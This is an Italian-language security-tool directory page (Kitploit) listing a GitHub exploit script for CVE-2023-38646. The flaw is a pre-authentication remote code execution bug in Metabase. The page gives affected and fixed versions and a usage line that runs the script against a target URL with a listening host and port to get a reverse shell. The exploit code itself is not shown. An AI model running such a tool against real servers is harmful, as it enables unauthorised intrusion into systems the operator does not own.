Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-38646 — Questo script è progettato per sfruttare versioni vulnerabili del software Metabase fornendo all'attaccante una shell. | Kitploit
Strumenti/GitHubGitHub/birdm4nw/cve-2023-38646
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubbirdm4nw/cve-2023-38646

CVE-2023-38646

Questo script è progettato per sfruttare versioni vulnerabili del software Metabase fornendo all'attaccante una shell.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-38646 - RCE su Metabase

Metabase open source precedente alla versione 0.46.6.1 e Metabase Enterprise precedente alla versione 1.46.6.1 consentono agli attaccanti di eseguire comandi arbitrari sul server, con i privilegi del server stesso. L'autenticazione non è richiesta per lo sfruttamento. Le altre versioni corrette sono 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2.

Se la versione di Metabase è vulnerabile, questo script ti permetterà, come attaccante, di ottenere una connessione shell sul sistema target.

Utilizzo

root@kitploit:~
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Esempio

scriptCapture

Autore: @birdm4nw

Riferimento

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Scarica lo strumento